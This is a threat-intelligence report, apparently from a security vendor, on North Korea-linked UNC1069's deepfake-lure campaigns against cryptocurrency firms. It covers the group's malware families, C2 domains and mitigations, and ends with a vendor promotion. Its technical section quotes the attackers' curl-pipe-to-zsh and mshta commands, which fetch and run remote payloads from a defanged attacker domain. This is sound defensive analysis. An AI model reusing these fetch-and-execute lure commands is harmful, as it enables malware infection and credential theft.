Executive Summary

The North Korea-linked threat actor UNC1069 has escalated its offensive operations against cryptocurrency organizations by integrating advanced artificial intelligence (AI) lures and multi-stage malware into its attack arsenal. Recent campaigns have demonstrated the use of AI-generated deepfake videos, sophisticated social engineering, and a modular malware framework targeting both Windows and macOS environments. The primary objective of these attacks is the exfiltration of credentials, session tokens, and sensitive data, ultimately enabling large-scale financial theft and further compromise of the cryptocurrency ecosystem. This report provides a comprehensive technical analysis of the tactics, techniques, and procedures (TTPs) employed by UNC1069, outlines observed exploitation in the wild, and offers actionable mitigation strategies for organizations operating in the digital asset sector.

Threat Actor Profile

UNC1069 is a financially motivated advanced persistent threat (APT) group with strong ties to North Korea, overlapping with the infamous Lazarus Group and Bluenoroff. The group is known for targeting cryptocurrency exchanges, DeFi platforms, fintech startups, and venture capital firms. UNC1069 has demonstrated a high degree of operational security, leveraging compromised social media accounts, AI-powered impersonation, and custom malware to achieve its objectives. The group’s campaigns are characterized by persistent reconnaissance, tailored social engineering, and rapid adaptation to security controls, making them a formidable adversary in the cryptocurrency threat landscape.

Technical Analysis of Malware/TTPs

UNC1069’s attack chain is initiated through highly targeted social engineering, often leveraging compromised Telegram accounts of industry executives. Victims are lured into joining fake video conferences hosted on attacker-controlled infrastructure, such as domains mimicking Zoom (e.g., zoom[.]uswe05[.]us). During these sessions, AI-generated deepfake videos and voice synthesis are used to impersonate trusted figures, increasing the likelihood of victim compliance.

The infection vector relies on convincing victims to execute “troubleshooting” commands under the guise of resolving audio or connectivity issues. On macOS, the command typically uses curl to fetch and execute a remote script, while on Windows, mshta is used to execute a malicious HTML application. Example commands include:

For macOS: curl -A audio -s hxxp://mylingocoin[.]com/audio/fix/6454694440 | zsh For Windows: mshta hxxp://mylingocoin[.]com/audio/fix/6454694440

Upon execution, a multi-stage malware framework is deployed, consisting of the following components:

WAVESHAPER acts as the initial backdoor, collecting system information and downloading additional payloads. HYPERCALL is a Go-based downloader that reflectively loads further malware modules. HIDDENCALL provides hands-on-keyboard access for interactive exploitation. SUGARLOADER is a downloader responsible for deploying data-mining modules. SILENCELIFT is a minimal backdoor that beacons host information and can disrupt Telegram processes to hinder detection. DEEPBREATH is a Swift-based data miner that manipulates the macOS Transparency, Consent, and Control (TCC) database to escalate privileges and access sensitive data, including credentials, browser data, Telegram sessions, and Apple Notes. CHROMEPUSH is a C++ data miner masquerading as a Chrome or Brave extension, capable of logging keystrokes and exfiltrating cookies and credentials.

Persistence is achieved through the creation of launch daemons on macOS and the installation of malicious browser extension native messaging hosts. Data exfiltration is staged in temporary folders, compressed, and transmitted via curl or HTTP POST requests to attacker-controlled command and control (C2) servers.

Key C2 infrastructure includes domains such as mylingocoin.com, zoom.uswe05.us, breakdream.com, dreamdie.com, support-zoom.us, supportzm.com, zmsupport.com, and cmailer.pro. Host-based indicators of compromise (IOCs) include specific file paths and SHA-256 hashes associated with each malware component.

The attack chain maps to several MITRE ATT&CK techniques, including T1566.002 (Spearphishing via Service), T1059 (Command and Scripting Interpreter), T1543.004 (Launch Daemon), T1176 (Browser Extensions), T1555 (Credentials from Password Stores), T1114 (Email Collection), T1119 (Automated Collection), and T1041 (Exfiltration Over C2 Channel).

Exploitation in the Wild

UNC1069’s campaigns have been observed targeting cryptocurrency startups, DeFi platforms, software developers, and venture capital firms across North America, Europe, and Asia. The group’s use of AI-generated lures has resulted in successful credential theft, session hijacking, and large-scale exfiltration of browser and wallet data. Notably, a recent investigation by Mandiant uncovered the deployment of seven distinct malware families within a single fintech organization, underscoring the group’s technical sophistication and persistence.

Victims are typically high-value individuals with access to cryptocurrency wallets, exchange infrastructure, or sensitive financial data. The impact of these attacks includes unauthorized fund transfers, compromise of multi-factor authentication mechanisms, and the potential for downstream supply chain attacks via compromised developer accounts.

Victimology and Targeting

The primary targets of UNC1069 are organizations and individuals operating within the cryptocurrency and Web3 sectors. This includes cryptocurrency exchanges, DeFi platforms, wallet providers, software developers, and venture capital funds with exposure to digital assets. The group’s targeting is global but has shown a particular focus on entities in North America, Europe, and Asia. Victims are often selected based on their access to high-value assets or privileged credentials, and the group employs extensive reconnaissance to tailor its social engineering lures.

Mitigation and Countermeasures

Organizations are advised to implement a multi-layered defense strategy to mitigate the risk posed by UNC1069. Key recommendations include:

Monitoring for outbound connections to known C2 domains and IP addresses associated with the group’s infrastructure, such as mylingocoin.com, breakdream.com, and cmailer.pro. Auditing for the presence of unusual launch daemons, browser extensions, and native messaging hosts, particularly those masquerading as legitimate services like Google Docs Offline. Educating employees and executives about the risks of social engineering, especially unsolicited requests to execute troubleshooting commands or join video calls from unfamiliar domains. Implementing strict application whitelisting and endpoint detection and response (EDR) solutions capable of detecting the execution of suspicious commands, such as curl or mshta, from untrusted sources. Regularly reviewing and hardening the macOS TCC database to prevent unauthorized privilege escalation and data access. Conducting proactive threat hunting for the specific file paths and SHA-256 hashes associated with UNC1069 malware components, as detailed in the technical analysis section. Enforcing strong multi-factor authentication (MFA) and monitoring for anomalous login activity, particularly from new devices or locations.

For organizations seeking to enhance their third-party risk management posture, Rescana’s TPRM platform provides continuous monitoring and assessment of vendor and supply chain security, helping to identify and mitigate exposure to advanced threats such as those posed by UNC1069.

References

Google Cloud Blog: UNC1069 Targets Cryptocurrency Sector with New Tooling and AI-Enabled Social Engineering https://cloud.google.com/blog/topics/threat-intelligence/unc1069-targets-cryptocurrency-ai-social-engineering

The Hacker News: North Korea-Linked UNC1069 Uses AI Lures to Attack Cryptocurrency Organizations https://thehackernews.com/2026/02/north-korea-linked-unc1069-uses-ai.html

Mandiant X (Twitter) Announcement https://x.com/Mandiant/status/2020965935239045434

MITRE ATT&CK: North Korea / Lazarus Group https://attack.mitre.org/groups/G0032/

Decrypt: Google Threat Report Links AI-powered Malware to DPRK Crypto Theft https://decrypt.co/347781/google-threat-report-links-ai-powered-malware-to-dprk-crypto-theft

About Rescana

Rescana is a leader in third-party risk management, providing organizations with a comprehensive platform to continuously monitor, assess, and mitigate cyber risks across their vendor and supply chain ecosystem. Our advanced analytics and threat intelligence capabilities empower security teams to proactively identify vulnerabilities and respond to emerging threats. For more information or to discuss how Rescana can support your organization’s cybersecurity objectives, please contact us at ops@rescana.com.